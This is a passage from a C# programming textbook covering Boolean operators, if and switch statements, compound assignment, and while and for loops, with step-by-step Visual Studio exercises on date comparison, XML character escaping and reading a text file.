expressions it’s evaluating are true. For example, the following statement
assigns the value true to validPercentage if and only if the value of percent is
greater than or equal to 0 and the value of percent is less than or equal to 100:
bool validPercentage;
validPercentage = (percent >= 0) && (percent <= 100);
Tip A common beginner’s error is to try to combine the two tests by
naming the percent variable only once, like this:
percent >= 0 && <= 100 // this statement will not compile
Using parentheses helps to avoid this type of mistake and also
clarifies the purpose of the expression. For example, compare
validPercentage = percent >= 0 && percent <= 100
and
validPercentage = (percent >= 0) && (percent <= 100)
Both expressions return the same value because the precedence of
the && operator is less than that of >= and <=. However, the second
expression conveys its purpose in a more readable manner.
The outcome of the || operator is true if either of the Boolean expressions
it evaluates is true. You use the || operator to determine whether any one of a
combination of Boolean expressions is true. For example, the following
statement assigns the value true to invalidPercentage if the value of percent
is less than 0 or the value of percent is greater than 100:
bool invalidPercentage;
invalidPercentage = (percent < 0) || (percent > 100);
Short-circuiting
The && and || operators both exhibit a feature called short-circuiting.
Sometimes, it is not necessary to evaluate both operands when ascertaining
the result of a conditional logical expression. For example, if the left operand
of the && operator evaluates to false, the result of the entire expression must
be false, regardless of the value of the right operand. Similarly, if the value of
the left operand of the || operator evaluates to true, the result of the entire
expression must be true, irrespective of the value of the right operand. In
these cases, the && and || operators bypass the evaluation of the right
operand. Here are some examples:
(percent >= 0) && (percent <= 100)
In this expression, if the value of percent is less than 0, the Boolean
expression on the left side of && evaluates to false. This value means that the
result of the entire expression must be false, and the Boolean expression to
the right of the && operator is not evaluated.
(percent < 0) || (percent > 100)
In this expression, if the value of percent is less than 0, the Boolean
expression on the left side of || evaluates to true. This value means that the
result of the entire expression must be true, and the Boolean expression to the
right of the || operator is not evaluated.
If you carefully design expressions that use the conditional logical
operators, you can boost the performance of your code by avoiding
unnecessary work. Place simple Boolean expressions that can be evaluated
easily on the left side of a conditional logical operator, and put more complex
expressions on the right side. In many cases, you will find that the program
does not need to evaluate the more complex expressions.
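A common practical use of short-circuiting is to place a cheap guard on the left that makes the right operand safe to evaluate. The following fragment is a minimal sketch with illustrative variable names:
string text = null;

// text.Length is never evaluated when text is null, because the
// && operator short-circuits as soon as its left operand is false.
if (text != null && text.Length > 0)
{
    Console.WriteLine(text);
}

int divisor = 0;

// Similarly, the division is skipped entirely when divisor is 0.
if (divisor != 0 && (100 / divisor) > 10)
{
    Console.WriteLine("The quotient is greater than 10");
}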
Summarizing operator precedence and associativity
The following table summarizes the precedence and associativity of all the
operators you have learned about so far. Operators in the same category have
the same precedence. The operators in categories higher up in the table take
precedence over operators in categories lower down.
Category         Operators  Description                                  Associativity
Primary          ()         Precedence override                          Left
                 ++         Post-increment
                 --         Post-decrement
Unary            !          Logical NOT                                  Left
                 +          Returns the value of the operand unchanged
                 -          Returns the value of the operand negated
                 ++         Pre-increment
                 --         Pre-decrement
Multiplicative   *          Multiply                                     Left
                 /          Divide
                 %          Division remainder (modulus)
Additive         +          Addition                                     Left
                 -          Subtraction
Relational       <          Less than                                    Left
                 <=         Less than or equal to
                 >          Greater than
                 >=         Greater than or equal to
Equality         ==         Equal to                                     Left
                 !=         Not equal to
Conditional AND  &&         Conditional AND                              Left
Conditional OR   ||         Conditional OR                               Left
Assignment       =          Assigns the right-hand operand to the left   Right
                            and returns the value that was assigned
Notice that the && operator and the || operator have a different
precedence: && is higher than ||.
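One consequence of this difference is that an expression combining && and || is grouped around && first. The following fragment, with illustrative values, shows the effect of adding explicit parentheses:
bool a = true, b = false, c = false;

bool mixed = a || b && c;     // means a || (b && c), so this is true
bool grouped = (a || b) && c; // forces the other grouping, so this is false

Console.WriteLine($"{mixed} {grouped}"); // writes True False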
Using if statements to make decisions
In a method, when you want to choose between executing two different
statements depending on the result of a Boolean expression, you can use an if
statement.
Understanding if statement syntax
The syntax of an if statement is as follows (if and else are C# keywords):
if ( booleanExpression )
statement-1;
else
statement-2;
If the booleanExpression evaluates to true, statement-1 runs; otherwise,
statement-2 runs. The else keyword and the subsequent statement-2 are
optional. If there is no else clause and the booleanExpression is false,
execution continues with whatever code follows the if statement. Also, notice
that the Boolean expression must be enclosed in parentheses; otherwise, the
code will not compile.
For example, here’s an if statement that increments a variable representing
the second hand of a stopwatch. (Minutes are ignored for now.) If the value
of the seconds variable is 59, it is reset to 0; otherwise, it is incremented by
using the ++ operator:
int seconds;
...
if (seconds == 59)
seconds = 0;
else
seconds++;
Boolean expressions only, please!
The expression in an if statement must be enclosed in parentheses.
Additionally, the expression must be a Boolean expression. In some
other languages—notably C and C++—you can write an integer
expression, and the compiler will silently convert the integer value to
true (nonzero) or false (0). C# does not support this behavior, and the
compiler reports an error if you write such an expression.
If you accidentally specify the assignment operator (=) instead of the
equality test operator (==) in an if statement, the C# compiler
recognizes your mistake and refuses to compile your code, such as in
the following example:
int seconds;
...
if (seconds = 59) // compile-time error
...
if (seconds == 59) // ok
Accidental assignments were another common source of bugs in C
and C++ programs, which would silently convert the value assigned
(59) to a Boolean expression (with anything nonzero considered to be
true), with the result being that the code following the if statement
would be performed every time.
Incidentally, you can use a Boolean variable as the expression for an
if statement, although it must still be enclosed in parentheses, as shown
in this example:
bool inWord;
...
if (inWord == true) // ok, but not commonly used
...
if (inWord) // more common and considered better style
Using blocks to group statements
Notice that the syntax of the if statement shown earlier specifies a single
statement after the if (booleanExpression) and a single statement after the
else keyword. Sometimes you’ll want to perform more than one statement
when a Boolean expression is true. You could group the statements inside a
new method and then call the new method, but a simpler solution is to group
the statements inside a block. A block is simply a sequence of statements
grouped between an opening brace and a closing brace.
In the following example, two statements that reset the seconds variable to
0 and increment the minutes variable are grouped inside a block, and the
entire block executes if the value of seconds is equal to 59:
int seconds = 0;
int minutes = 0;
...
if (seconds == 59)
{
seconds = 0;
minutes++;
}
else
{
seconds++;
}
Important If you omit the braces, the C# compiler associates only the
first statement (seconds = 0;) with the if statement. The subsequent
statement (minutes++;) will not be recognized by the compiler as part
of the if statement when the program is compiled. Furthermore, when
the compiler reaches the else keyword, it will not associate it with the
previous if statement; instead, it will report a syntax error. Therefore, it
is good practice to always define the statements for each branch of an if
statement within a block, even if a block consists of only a single
statement. It might save you some grief later if you want to add
additional code.
A block also starts a new scope. You can define variables inside a block,
but they will disappear at the end of the block. The following code fragment
illustrates this point:
if (...)
{
int myVar = 0;
... // myVar can be used here
} // myVar disappears here
else
{
// myVar cannot be used here
...
}
// myVar cannot be used here
Cascading if statements
You can nest if statements inside other if statements. In this way, you can
chain together a sequence of Boolean expressions, which are tested one after
the other until one of them evaluates to true. In the following example, if the
value of day is 0, the first test evaluates to true and dayName is assigned the
string “Sunday”. If the value of day is not 0, the first test fails and control
passes to the else clause, which runs the second if statement and compares the
value of day with 1. The second if statement executes only if the first test is
false. Similarly, the third if statement executes only if the first and second
tests are false.
if (day == 0)
{
dayName = "Sunday";
}
else if (day == 1)
{
dayName = "Monday";
}
else if (day == 2)
{
dayName = "Tuesday";
}
else if (day == 3)
{
dayName = "Wednesday";
}
else if (day == 4)
{
dayName = "Thursday";
}
else if (day == 5)
{
dayName = "Friday";
}
else if (day == 6)
{
dayName = "Saturday";
}
else
{
dayName = "unknown";
}
In the following exercise, you’ll write a method that uses a cascading if
statement to compare two dates.
Write if statements
1. Start Microsoft Visual Studio 2017, if it is not already running.
2. Open the Selection solution, which is located in the \Microsoft Press\VCSBS\Chapter 4\Selection folder in your Documents folder.
3. On the Debug menu, click Start Debugging.
Visual Studio 2017 builds and runs the application. The form displays
two DatePicker controls, called firstDate and secondDate. Both controls
display the current date.
4. Click Compare.
The following text appears in the text box in the lower half of the
window:
firstDate == secondDate : False
firstDate != secondDate : True
firstDate < secondDate : False
firstDate <= secondDate : False
firstDate > secondDate : True
firstDate >= secondDate : True
The Boolean expression, firstDate == secondDate, should be true
because both firstDate and secondDate are set to the current date. In
fact, only the less-than operator and the greater-than-or-equal-to
operator seem to be working correctly. The following image shows the
application running.
5. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
6. Display the code for the MainPage.xaml.cs file in the Code and Text
Editor window.
7. Locate the compareClick method, which should look like this:
private void compareClick(object sender, RoutedEventArgs e)
{
int diff = dateCompare(firstDate.Date.LocalDateTime,
secondDate.Date.LocalDateTime);
info.Text = "";
show("firstDate == secondDate", diff == 0);
show("firstDate != secondDate", diff != 0);
show("firstDate < secondDate", diff < 0);
show("firstDate <= secondDate", diff <= 0);
show("firstDate > secondDate", diff > 0);
show("firstDate >= secondDate", diff >= 0);
}
This method runs whenever the user clicks the Compare button on the
form. The expressions firstDate.Date.LocalDateTime and
secondDate.Date.LocalDateTime hold DateTime values; they represent
the dates displayed in the firstDate and secondDate controls on the form
elsewhere in the application. The DateTime data type is just another data
type, like int or float, except that it contains subelements with which you
can access the individual pieces of a date, such as the year, month, or
day.
The compareClick method passes the two DateTime values to the
dateCompare method. The purpose of this method is to compare dates
and return the int value 0 if they are the same, −1 if the first date is less
than the second, and +1 if the first date is greater than the second. A date
is considered greater than another date if it comes after it
chronologically. You will examine the dateCompare method in the next
step.
The show method displays the results of the comparison in the info text
box control in the lower half of the form.
8. Locate the dateCompare method, which should look like this:
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
// TO DO
return 42;
}
This method currently returns the same value whenever it is called, rather than 0, −1, or +1, regardless of the values of its parameters. This explains
why the application is not working as expected. You need to implement
the logic in this method to compare two dates correctly.
9. Remove the // TO DO comment and the return statement from the
dateCompare method.
10. Add the following statements shown in bold to the body of the
dateCompare method:
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
int result = 0;
if (leftHandSide.Year < rightHandSide.Year)
{
result = -1;
}
else if (leftHandSide.Year > rightHandSide.Year)
{
result = 1;
}
}
Note Don’t try to build the application yet. The dateCompare
method is not complete, and the build will fail.
If the expression leftHandSide.Year < rightHandSide.Year is true, the
date in leftHandSide must be earlier than the date in rightHandSide, so
the program sets the result variable to −1. Otherwise, if the expression
leftHandSide.Year > rightHandSide.Year is true, the date in
leftHandSide must be later than the date in rightHandSide, and the
program sets the result variable to 1.
If the expression leftHandSide.Year < rightHandSide.Year is false and
the expression leftHandSide.Year > rightHandSide.Year is also false, the
Year property of both dates must be the same, so the program needs to
compare the months in each date.
11. Add the following statements shown in bold to the body of the
dateCompare method. Type them immediately after the code you
entered in the preceding step:
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
...
else if (leftHandSide.Month < rightHandSide.Month)
{
result = -1;
}
else if (leftHandSide.Month > rightHandSide.Month)
{
result = 1;
}
}
These statements compare months following a logic similar to that used
to compare years in the preceding step.
If the expression leftHandSide.Month < rightHandSide.Month is false
and the expression leftHandSide.Month > rightHandSide.Month is also
false, the Month property of both dates must be the same, so the program
finally needs to compare the days in each date.
12. Add the following statements shown in bold to the body of the
dateCompare method after the code you entered in the preceding two
steps. Also, remove the return 42 statement that you added earlier:
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
...
else if (leftHandSide.Day < rightHandSide.Day)
{
result = -1;
}
else if (leftHandSide.Day > rightHandSide.Day)
{
result = 1;
}
else
{
result = 0;
}
return result;
}
You should recognize the pattern in this logic by now.
If leftHandSide.Day < rightHandSide.Day and leftHandSide.Day >
rightHandSide.Day both are false, the value in the Day properties in
both variables must be the same. The Month values and the Year values
must also be identical, respectively, for the program logic to have
reached this point, so the two dates must be the same, and the program
sets the value of result to 0.
The final statement returns the value stored in the result variable.
13. On the Debug menu, click Start Debugging to rebuild and run the
application.
14. Click Compare.
The following text appears in the text box:
firstDate == secondDate : True
firstDate != secondDate : False
firstDate < secondDate: False
firstDate <= secondDate: True
firstDate > secondDate: False
firstDate >= secondDate: True
These are the correct results for identical dates.
15. Use the DatePicker controls to select a later date for the second date and
then click Compare.
The following text appears in the text box:
firstDate == secondDate: False
firstDate != secondDate: True
firstDate < secondDate: True
firstDate <= secondDate: True
firstDate > secondDate: False
firstDate >= secondDate: False
Again, these are the correct results when the first date is earlier than the
second date.
16. Test some other dates, and verify that the results are as you would
expect. Return to Visual Studio 2017 and stop debugging when you
have finished.
Comparing dates in real-world applications
Now that you have seen how to use a rather long and complicated
series of if and else statements, I should mention that this is not the
technique you would employ to compare dates in a real-world
application. If you look at the dateCompare method from the
preceding exercise, you will see that the two parameters,
leftHandSide and rightHandSide, are DateTime values. The logic
you have written compares only the date part of these parameters,
but they also contain a time element that you have not considered
(or displayed). For two DateTime values to be considered equal,
they should have not only the same date but also the same time.
Comparing dates and times is such a common operation that the
DateTime type actually has a built-in method called Compare for
doing just that: it takes two DateTime arguments and compares
them, returning a value indicating whether the first argument is
less than the second, in which case the result will be negative;
whether the first argument is greater than the second, in which case
the result will be positive; or whether both arguments represent the
same date and time, in which case the result will be 0.
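Here is a minimal sketch of the Compare method in use. The two values are illustrative; they share the same date but have different times, which is enough to make them unequal:
DateTime first = new DateTime(2017, 1, 1, 9, 30, 0);   // 1 January 2017, 09:30
DateTime second = new DateTime(2017, 1, 1, 14, 0, 0);  // 1 January 2017, 14:00

int result = DateTime.Compare(first, second);

if (result < 0)
{
    Console.WriteLine("first is earlier than second"); // this branch runs
}
else if (result > 0)
{
    Console.WriteLine("first is later than second");
}
else
{
    Console.WriteLine("first and second are the same date and time");
}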
Using switch statements
Sometimes when you write a cascading if statement, each of the if statements
look similar because they all evaluate an identical expression. The only
difference is that each if compares the result of the expression with a different
value. For example, consider the following block of code that uses an if
statement to examine the value in the day variable and work out which day of
the week it is:
if (day == 0)
{
dayName = "Sunday";
}
else if (day == 1)
{
dayName = "Monday";
}
else if (day == 2)
{
dayName = "Tuesday";
}
else if (day == 3)
{
...
}
else
{
dayName = "Unknown";
}
Often in these situations, you can rewrite the cascading if statement as a
switch statement to make your program more efficient and more readable.
Understanding switch statement syntax
The syntax of a switch statement is as follows (switch, case, and default are
keywords):
switch ( controllingExpression )
{
case constantExpression :
statements
break;
case constantExpression :
statements
break;
...
default :
statements
break;
}
The controllingExpression, which must be enclosed in parentheses, is
evaluated once. Control then jumps to the block of code identified by the
constantExpression whose value is equal to the result of the
controllingExpression. (The constantExpression identifier is also called a
case label.) Execution runs as far as the break statement, at which point the
switch statement finishes and the program continues at the first statement that
follows the closing brace of the switch statement. If none of the
constantExpression values is equal to the value of the controllingExpression,
the statements below the optional default label run.
Note Each constantExpression value must be unique so that the
controllingExpression will match only one of them. If the value of the
controllingExpression does not match any constantExpression value
and there is no default label, program execution continues with the first
statement that follows the closing brace of the switch statement.
So, you can rewrite the previous cascading if statement as the following
switch statement:
switch (day)
{
case 0 :
dayName = "Sunday";
break;
case 1 :
dayName = "Monday";
break;
case 2 :
dayName = "Tuesday";
break;
...
default :
dayName = "Unknown";
break;
}
Following the switch statement rules
The basic switch statement is very useful, but unfortunately, you can’t always
use it when you might like to. Any switch statement you write must adhere to
the following rules:
You can use switch only on certain data types, such as int, char, or
string. With any other types (including float and double), you must use
an if statement.
The case labels must be constant expressions, such as 42 if the switch data type is an int, '4' if the switch data type is a char, or “42” if the switch data type is a string. If you need to calculate your case label values at runtime, you must use an if statement.
The case labels must be unique expressions. In other words, two case
labels cannot have the same value.
You can specify that you want to run the same statements for more
than one value by providing a list of case labels and no intervening
statements, in which case the code for the final label in the list is
executed for all cases in that list. However, if a label has one or more
associated statements, execution cannot fall through to subsequent
labels; in this case, the compiler generates an error. The following code
fragment illustrates these points:
switch (trumps)
{
case Hearts :
case Diamonds : // Fall-through allowed - no code between
labels
color = "Red"; // Code executed for Hearts and Diamonds
break;
case Clubs :
color = "Black";
case Spades : // Error - code between labels
color = "Black";
break;
}
Note The break statement is the most common way to stop fall-through,
but you can also use a return statement to exit from the method
containing the switch statement or a throw statement to generate an
exception and abort the switch statement. The throw statement is
described in Chapter 6, “Managing errors and exceptions.”
switch fall-through rules
Because you cannot accidentally fall through from one case label to the
next if there is any intervening code, you can freely rearrange the
sections of a switch statement without affecting its meaning (including
the default label, which by convention is usually—but does not have to
be—placed as the last label).
C and C++ programmers should note that the break statement is
mandatory for every case in a switch statement (even the default case).
This requirement is a good thing—it is common in C or C++ programs
to forget the break statement, allowing execution to fall through to the
next label and leading to bugs that are difficult to spot.
If you really want to, you can mimic C/C++ fall-through in C# by
using a goto statement to go to the following case or default label.
Using goto, in general, is not recommended, though, and this book does
not show you how to do it.
In the following exercise, you will complete a program that reads the
characters of a string and maps each character to its XML representation. For
example, the left angle bracket character (<) has a special meaning in XML
(it’s used to form elements). If you have data that contains this character, it
must be translated into the text entity &lt; so that an XML processor knows
that it is data and not part of an XML instruction. Similar rules apply to the
right angle bracket (>), ampersand (&), single quotation mark (‘), and double
quotation mark (“) characters. You will write a switch statement that tests the
value of the character and traps the special XML characters as case labels.
Write switch statements
1. Start Visual Studio 2017, if it is not already running.
2. Open the SwitchStatement solution, which is located in the \Microsoft
Press\VCSBS\Chapter 4\SwitchStatement folder in your Documents
folder.
3. On the Debug menu, click Start Debugging.
Visual Studio 2017 builds and runs the application. The application
displays a form containing two text boxes separated by a Copy button.
4. Type the following sample text into the upper text box:
inRange = (lo <= number) && (hi >= number);
5. Click Copy.
The statement is copied verbatim into the lower text box, and no
translation of the <, &, or > characters occurs, as shown in the following
screen shot.
6. Return to Visual Studio 2017 and stop debugging.
7. Display the code for MainPage.xaml.cs in the Code and Text Editor
window and locate the copyOne method. It currently looks like this:
private void copyOne(char current)
{
switch (current)
{
default:
target.Text += current;
break;
}
}
The copyOne method copies the character specified as its input
parameter to the end of the text displayed in the lower text box. At the
moment, copyOne contains a switch statement with a single default
action. In the following few steps, you will modify this switch statement
to convert characters that are significant in XML to their XML mapping.
For example, the < character will be converted to the string &lt;.
8. Add the following statements shown in bold to the switch statement after
the opening brace for the statement and directly before the default label:
switch (current)
{
case '<' :
target.Text += "&lt;";
break;
default:
target.Text += current;
break;
}
If the current character being copied is a left angle bracket (<), the preceding code appends the string “&lt;” to the text being output in its place.
9. Add the following cases to the switch statement after the break
statement you have just added, but above the default label:
case '>' :
target.Text += "&gt;";
break;
case '&' :
target.Text += "&amp;";
break;
case '\"' :
target.Text += "&quot;";
break;
case '\'' :
target.Text += "&apos;";
break;
Note The single quotation mark (‘) and double quotation mark (“)
have a special meaning in C#—they are used to delimit character
and string constants. The backslash (\) in the final two case labels
is an escape character that causes the C# compiler to treat these
characters as literals rather than as delimiters.
10. On the Debug menu, click Start Debugging.
11. Type the following text into the upper text box:
inRange = (lo <= number) && (hi >= number);
12. Click Copy.
The statement is copied into the lower text box. This time, each
character undergoes the XML mapping implemented in the switch
statement. The target text box displays the following text:
inRange = (lo &lt;= number) &amp;&amp; (hi &gt;= number);
13. Experiment with other strings and verify that all special characters (<, >, &, “, and ‘) are handled correctly.
14. Return to Visual Studio and stop debugging.
Summary
In this chapter, you learned about Boolean expressions and variables. You
saw how to use Boolean expressions with the if and switch statements to
make decisions in your programs, and you combined Boolean expressions by
using the Boolean operators.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 5, “Using compound assignment and
iteration statements.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To: Determine whether two values are equivalent
Do this: Use the == operator or the != operator. For example:
answer == 42

To: Compare the value of two expressions
Do this: Use the <, <=, >, or >= operator. For example:
age >= 21

To: Declare a Boolean variable
Do this: Use the bool keyword as the type of the variable. For example:
bool inRange;

To: Create a Boolean expression that is true only if two conditions are both true
Do this: Use the && operator. For example:
inRange = (lo <= number) && (number <= hi);

To: Create a Boolean expression that is true if either of two conditions is true
Do this: Use the || operator. For example:
outOfRange = (number < lo) || (hi < number);

To: Run a statement if a condition is true
Do this: Use an if statement. For example:
if (inRange)
    process();

To: Run more than one statement if a condition is true
Do this: Use an if statement and a block. For example:
if (seconds == 59)
{
    seconds = 0;
    minutes++;
}

To: Associate different statements with different values of a controlling expression
Do this: Use a switch statement. For example:
switch (current)
{
    case 0:
        ...
        break;
    case 1:
        ...
        break;
    default:
        ...
        break;
}
CHAPTER 5
Using compound assignment and
iteration statements
After completing this chapter, you will be able to:
Update the value of a variable by using compound assignment
operators.
Write while, for, and do iteration statements.
Step through a do statement and watch as the values of variables
change.
Chapter 4, “Using decision statements,” demonstrates how to use the if and
switch constructs to run statements selectively. In this chapter, you’ll see how
to use a variety of iteration (or looping) statements to run one or more
statements repeatedly.
When you write iteration statements, you usually need to control the
number of iterations that you perform. You can achieve this by using a
variable, updating its value as each iteration is performed, and stopping the
process when the variable reaches a particular value. To help simplify this
process, you’ll start by learning about the special assignment operators that
you should use to update the value of a variable in these circumstances.
Using compound assignment operators
You’ve already seen how to use arithmetic operators to create new values.
For example, the following statement uses the plus operator (+) to display to
the console a value that is 42 greater than the variable answer:
Console.WriteLine(answer + 42);
You’ve also seen how to use assignment statements to change the value of
a variable. The following statement uses the assignment operator (=) to
change the value of answer to 42:
answer = 42;
If you want to add 42 to the value of a variable, you can combine the
assignment operator and the plus operator. For example, the following
statement adds 42 to answer. After this statement runs, the value of answer is
42 more than it was before:
answer = answer + 42;
Although this statement works, you’ll probably never see an experienced
programmer write code like this. Adding a value to a variable is so common
that C# provides a way for you to perform this task in a shorthand manner by
using the operator +=. To add 42 to answer, you can write the following
statement:
answer += 42;
You can use this notation to combine any arithmetic operator with the
assignment operator, as the following table shows. These operators are
collectively known as the compound assignment operators.
Don’t write this
Write this
variable = variable * number;
variable *= number;
variable = variable / number;
variable /= number;
variable = variable % number;
variable %= number;
variable = variable + number;
variable += number;
Download from finelybook [email protected]
202
variable = variable - number;
variable -= number;
Tip The compound assignment operators share the same precedence
and right associativity as the simple assignment operator (=).
The += operator also works on strings; it appends one string to the end of
another. For example, the following code displays “Hello John” on the
console:
string name = "John";
string greeting = "Hello ";
greeting += name;
Console.WriteLine(greeting);
You cannot use any of the other compound assignment operators on
strings.
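The following fragment runs the arithmetic compound assignment operators in sequence; the comment on each line shows the value of total after that statement runs:
int total = 10;
total += 5;  // 15
total -= 3;  // 12
total *= 4;  // 48
total /= 6;  // 8
total %= 5;  // 3
Console.WriteLine(total); // writes 3 to the console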
Tip Use the increment (++) and decrement (--) operators instead of a
compound assignment operator when incrementing or decrementing a
variable by 1. For example, replace
count += 1;
with
count++;
Writing while statements
You use a while statement to run a statement repeatedly for as long as some
condition is true. The syntax of a while statement is as follows:
while ( booleanExpression )
statement
The Boolean expression (which must be enclosed in parentheses) is
evaluated, and if it is true, the statement runs and then the Boolean expression
is evaluated again. If the expression is still true, the statement is repeated, and
then the Boolean expression is evaluated yet again. This process continues
until the Boolean expression evaluates to false, at which point the while
statement exits. Execution then continues with the first statement that follows
the while statement. A while statement shares the following syntactic
similarities with an if statement (in fact, the syntax is identical except for the
keyword):
The expression must be a Boolean expression.
The Boolean expression must be written within parentheses.
If the Boolean expression evaluates to false when first evaluated, the
statement does not run.
If you want to perform two or more statements under the control of a
while statement, you must use braces to group those statements in a
block.
Here’s a while statement that writes the values 0 through 9 to the console.
Note that as soon as the variable i reaches the value 10, the while statement
finishes and the code in the statement block does not run:
int i = 0;
while (i < 10)
{
Console.WriteLine(i);
i++;
}
All while statements should terminate at some point. A common
beginner’s mistake is to forget to include a statement to cause the Boolean
expression eventually to evaluate to false and terminate the loop, which
results in a program that runs forever. In the example, the statement i++;
performs this role.
Note The variable i in the while loop controls the number of iterations
that the loop performs. This is a common idiom, and the variable that
performs this role is sometimes called the sentinel variable. You can
also create nested loops (one loop inside another), and in these cases, it
is common to extend this naming pattern to use the letters j, k, and even
l as the names of the sentinel variables used to control the iterations in
these loops.
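For example, a pair of nested while loops that follows this naming convention might look like the following sketch, which writes a small multiplication grid to the console:
int i = 1;
while (i <= 3)          // outer loop, controlled by the sentinel variable i
{
    int j = 1;
    while (j <= 3)      // inner loop, controlled by the sentinel variable j
    {
        Console.Write($"{i * j,4}");
        j++;
    }
    Console.WriteLine();
    i++;
}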
Tip As with if statements, it is recommended that you always use a
block with a while statement, even if the block contains only a single
statement. This way, if you decide to add more statements to the body
of the while construct later, it is clear that you should add them to the
block. If you don’t do this, only the first statement that immediately
follows the Boolean expression in the while construct will be executed
as part of the loop, resulting in difficult-to-spot bugs such as this:
int i = 0;
while (i < 10)
Console.WriteLine(i);
i++;
This code iterates forever, displaying an infinite number of zeros,
because only the Console.WriteLine statement—and not the i++;
statement—is executed as part of the while construct.
In the following exercise, you will write a while loop to iterate through the
contents of a text file one line at a time and write each line to a text box in a
form.
Write a while statement
1. Using Microsoft Visual Studio 2017, open the WhileStatement solution,
which is located in the \Microsoft Press\VCSBS\Chapter
5\WhileStatement folder in your Documents folder.
2. On the Debug menu, click Start Debugging.
Visual Studio 2017 builds and runs the application. The application is a
simple text file viewer that you can use to select a text file and display
its contents.
3. Click Open File.
The Open File picker appears and displays the files in the Documents
folder, as shown in the following screenshot (the list of files and folders
might be different on your computer).
You can use this dialog to move to a folder and select a file to display.
4. Move to the \Microsoft Press\VCSBS\Chapter
5\WhileStatement\WhileStatement folder in your Documents folder.
5. Select the file MainPage.xaml.cs, and then click Open.
The name of the file, MainPage.xaml.cs, appears in the text box at the
top of the form, but the contents of the file do not appear in the large text
box. This is because you have not yet implemented the code that reads
the contents of the file and displays it. You will add this functionality in
the following steps.
6. Return to Visual Studio 2017 and stop debugging.
7. Display the code for the file MainPage.xaml.cs in the Code and Text
Editor window, and locate the openFileClick method.
This method runs when the user clicks the Open button to select a file in
the Open dialog box. It is not necessary for you to understand the exact
details of how this method works at this point—simply accept the fact
that this method prompts the user for a file (using a FileOpenPicker or
OpenFileDialog window) and opens the selected file for reading.
The final two statements in the openFileClick method are important,
however. They look like this:
TextReader reader = new
StreamReader(inputStream.AsStreamForRead());
displayData(reader);
The first statement declares a TextReader variable called reader.
TextReader is a class provided by the Microsoft.NET Framework that
you can use for reading streams of characters from sources such as files.
It is located in the System.IO namespace. This statement makes the data
in the file specified by the user in the FileOpenPicker available to the
TextReader object, which can then be used to read the data from the file.
The final statement calls a method named displayData, passing reader
as a parameter to this method. The displayData method reads the data by
using the reader object and displays it on the screen (or it will do so
once you have written the code to accomplish this).
8. Examine the displayData method. It currently looks like this:
private void displayData(TextReader reader)
{
// TODO: add while loop here
}
You can see that, other than the comment, this method is currently
empty. This is where you need to add the code to fetch and display the
data.
9. Replace the // TODO: add while loop here comment with the following
statement:
source.Text = "";
The source variable refers to the large text box on the form. Setting its
Text property to the empty string (“”) clears any text that is currently
displayed in this text box.
10. Add the following statement after the previous line that you added to the
displayData method:
string line = reader.ReadLine();
This statement declares a string variable called line and calls the
reader.ReadLine method to read the first line from the file into this
variable. This method returns either the next line of text from the file or
a special value called null when there are no more lines to read.
11. Add the following statements to the displayData method after the code
you have just entered:
while (line != null)
{
source.Text += line + '\n';
line = reader.ReadLine();
}
This is a while loop that iterates through the file one line at a time until
there are no more lines available.
The Boolean expression at the start of the while loop examines the value
in the line variable. If it is not null, the body of the loop displays the
current line of text by appending it to the Text property of the source
text box, together with a newline character (‘\n’—the ReadLine method
of the TextReader object strips out the newline characters as it reads
each line, so the code needs to add it back in again). The while loop then
reads in the next line of text before performing the next iteration. The
while loop finishes when there is no more text to read in the file, and the
ReadLine method returns a null value.
12. Type the following statement after the closing brace at the end of the
while loop:
reader.Dispose();
This statement releases the resources associated with the file and closes
it. This is good practice because it makes it possible for other
applications to use the file and also frees up any memory and other
resources used to access the file.
13. On the Debug menu, click Start Debugging.
14. When the form appears, click Open File.
15. In the Open file picker, move to the \Microsoft Press\VCSBS\Chapter
5\WhileStatement\WhileStatement folder in your Documents folder,
select the file MainPage.xaml.cs, and then click Open.
Note Don’t try to open a file that does not contain text. If you
attempt to open an executable program or a graphics file, for
example, the application will simply display a text representation
of the binary information in this file. If the file is large, it might
hang the application, requiring you to terminate it forcibly.
This time, the contents of the selected file appear in the text box—you
should recognize the code that you have been editing. The following
image shows the application running:
16. Scroll through the text in the text box and find the displayData method.
Verify that this method contains the code you just added.
17. Return to Visual Studio and stop debugging.
Writing for statements
In C#, most while statements have the following general structure:
initialization
while (Boolean expression)
{
statement
update control variable
}
The for statement in C# provides a more formal version of this kind of
construct by combining the initialization, Boolean expression, and code that
updates the control variable. You’ll find the for statement useful because in a
for statement, it is much harder to accidentally leave out the code that
initializes or updates the control variable, so you are less likely to write code
that loops forever. Here is the syntax of a for statement:
for (initialization; Boolean expression; update control variable)
statement
The statement that forms the body of the for construct can be a single line
of code or a code block enclosed in braces.
You can rephrase the while loop shown earlier that displays the integers
from 0 through 9 as the following for loop:
for (int i = 0; i < 10; i++)
{
Console.WriteLine(i);
}
The initialization occurs just once, at the very beginning of the loop. Then,
if the Boolean expression evaluates to true, the statement runs. The control
variable update occurs, and then the Boolean expression is reevaluated. If the
condition is still true, the statement is executed again, the control variable is
updated, the Boolean expression is evaluated again, and so on.
Notice that the initialization occurs only once, that the statement in the
body of the loop always executes before the update occurs, and that the
update occurs before the Boolean expression reevaluates.
Tip As with the while statement, it is considered a good practice to
always use a code block even if the body of the for loop contains just a
single statement. If you add additional statements to the body of the for
loop later, this approach will help to ensure that your code is always
executed as part of each iteration.
You can omit any of the three parts of a for statement. If you omit the
Boolean expression, it defaults to true, so the following for statement runs
forever:
for (int i = 0; ;i++)
{
Console.WriteLine("somebody stop me!");
}
If you omit the initialization and update parts, you have a strangely spelled
while loop:
int i = 0;
for (; i < 10; )
{
Console.WriteLine(i);
i++;
}
Note The initialization, Boolean expression, and update control variable
parts of a for statement must always be separated by semicolons, even
when they are omitted.
You can also provide multiple initializations and multiple updates in a for
loop. (You can have only one Boolean expression, though.) To achieve this,
separate the various initializations and updates with commas, as shown in the
following example:
for (int i = 0, j = 10; i <= j; i++, j--)
{
...
}
As a final example, here is the while loop from the preceding exercise
recast as a for loop:
for (string line = reader.ReadLine(); line != null; line =
reader.ReadLine())
{
source.Text += line + '\n';
}
Understanding for statement scope
You might have noticed that you can declare a variable in the initialization
